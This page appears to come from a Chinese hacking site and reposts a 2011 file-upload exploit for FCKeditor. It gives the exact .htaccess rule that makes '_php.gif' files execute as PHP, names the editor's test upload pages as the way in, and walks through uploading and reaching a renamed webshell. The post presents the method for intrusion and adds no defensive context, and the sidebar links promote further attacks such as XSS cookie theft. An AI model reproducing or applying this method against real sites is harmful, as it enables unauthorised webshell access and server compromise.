FCKeditor编辑器全部版本另类上传漏洞

		当前位置：主页>安全文章>文章资料>入侵实例>文章内容

FCKeditor编辑器全部版本另类上传漏洞

来源：pentesters.ir 作者：pentesters.ir 发布时间：2011-08-29

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

http://www.xxx.cn/FCKeditor/editor/filemanager/upload/test.html

http://www.xxx.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.xxx.cn/上传目录/shell_php.gif

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·另类网站入侵之一句话木马图片的
·0day批量拿站webshell，挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC

推荐广告